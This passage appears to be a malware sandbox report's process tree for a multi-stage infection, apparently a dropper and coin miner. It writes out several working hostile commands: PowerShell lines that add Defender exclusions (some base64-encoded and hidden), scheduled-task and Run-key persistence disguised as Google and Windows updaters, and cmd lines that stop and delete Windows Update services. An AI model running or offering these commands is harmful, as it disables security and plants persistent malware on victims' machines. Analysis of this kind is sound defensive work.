        "C:\Users\Admin\AppData\Local\Temp\AITMP0\IconRemoval.exe" /s %2
        5⤵
        
        PID:6636
    - - C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AITMP0\7zipFOPBACKEND.exe" /s %1
        5⤵
        
        PID:8100
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\i.exe"
    3⤵
    PID:5208
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AXEMUP~1.EXE"
    3⤵
    PID:5904
  - - C:\Users\Admin\AppData\Local\Temp\Files\AXEMUP~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\AXEMUP~1.EXE
      4⤵
      PID:3892
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\KB^FR_~1.EXE"
    3⤵
    PID:7524
  - - C:\Users\Admin\AppData\Local\Temp\Files\KB^FR_~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\KB^FR_~1.EXE
      4⤵
      PID:7468
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 716
        5⤵
        Program crash
        
        PID:4760
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\psfile.exe"
    3⤵
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\Files\psfile.exe
      C:\Users\Admin\AppData\Local\Temp\Files\psfile.exe
      4⤵
      PID:3928
    - - C:\Users\Admin\AppData\Local\Temp\Files\._cache_psfile.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\._cache_psfile.exe"
        5⤵
        
        PID:7132
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 884
        6⤵
        Program crash
        
        PID:6344
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\DMI1DF~1.EXE"
    3⤵
    PID:6760
  - - C:\Users\Admin\AppData\Local\Temp\Files\DMI1DF~1.EXE
      C:\Users\Admin\AppData\Local\Temp\Files\DMI1DF~1.EXE
      4⤵
      PID:6908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        
        PID:8128
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        5⤵
        
        PID:1896
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:4200
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        
        PID:7040
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        
        PID:3128
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        
        PID:5928
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        
        PID:8008
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:3212
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:6340
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:888
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:2832
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:6232
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:7180
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:7296
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:4564
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        
        PID:5740
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:2396
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:2052
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        
        PID:7972
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        5⤵
        
        PID:6960
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        6⤵
        
        PID:2916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1148
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
  2⤵
  PID:5504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3532
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:6004
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4164
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5324
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4908
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5936
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5916
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:3752
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:5564
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:3188
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3328
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5240
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3884
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3768
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:460
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4952
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:1692
- - C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
    C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
    3⤵
    PID:1860
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
      4⤵
      Drops file in Windows directory
      PID:576
    - - C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        5⤵
        
        PID:1512
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        6⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        7⤵
        
        PID:2220
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"
        8⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe
        9⤵
        
        PID:3248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        10⤵
        
        PID:4560
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        11⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        12⤵
        
        PID:1008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        10⤵
        
        PID:1896
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        11⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=stub.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        12⤵
        
        PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  PID:1476
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:1168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1228
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:2752
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:236
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5588
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5080
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5904
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1968
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:5380
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1364
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:2696
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:600
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:5516
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe pxpxvzslvmqtfph
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:5996
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:4292
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  PID:2328
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe jgqccdbbxrzbdlfm 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZe7ZXiwOLhA74FQzXCOhDuCEgX6WVRJena9L8fAOb/OCpbdBtftU9QMBxG8aHan0UHttTlDXmg8zTJWEzz1jyzM08ycWZiYcc5uJhds9Rh8+fDvfznlHAMreIYNxYX5k9xJHAc4B0ozcm5wxfAVR1NkkPB2hskLA90oq6EEwunLM+cHugrCZPmAL+xjChc1L0WUYPKljZ7G2hVhhzqEtgfjve5jiLrrwjfPxGeeAf9vve0gqrSPFO0K58xxNJ8ClGMYA3jdfqtywTWLARpI3q8mmFmhW90pU5VNfoa01PrEPOLs5r8ABfO582XBZtlugNpAIuxABxOKWLf8XQtXZvoQ7dHNPMO3GgNUOP3U0XxrRiFOF/vB7jsNiVJkb1bI5v5nt59vi2Czwj87T9ujtAUxaRW+5V3BDnzrgkctEMZcXBV724S22jgwV6IzKvy6UKGJnVaM3eKyvceEhYeYhPyF7ZZaH7hc6eH/4/zT7gy/FOEOKoQlj9wOdYItup8djwg3zNzf9whNSzJ/f9PwHpnsQ==
  2⤵
  PID:4600

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:3000
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  PID:5680

C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4880 -ip 4880
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4880 -ip 4880
1⤵
PID:1964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6132 -ip 6132
1⤵
PID:3608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572

C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5572
- C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
  C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:1364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:5376
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:1896
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      4⤵
      PID:3500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3624

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2748
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1520
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:808
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:2844
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:644

C:\Users\Admin\AppData\Local\Temp\dredyybkf.exe
C:\Users\Admin\AppData\Local\Temp\dredyybkf.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4840
- C:\Users\Admin\AppData\Local\Temp\dredyybkf.exe
  C:\Users\Admin\AppData\Local\Temp\dredyybkf.exe
  2⤵
  - Executes dropped EXE
  PID:3796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA
1⤵
PID:3580

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
- Detects videocard installed
PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2108 -ip 2108
1⤵
PID:1436

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2184

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
PID:3688
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\SUPPOR~1.EXE"
  2⤵
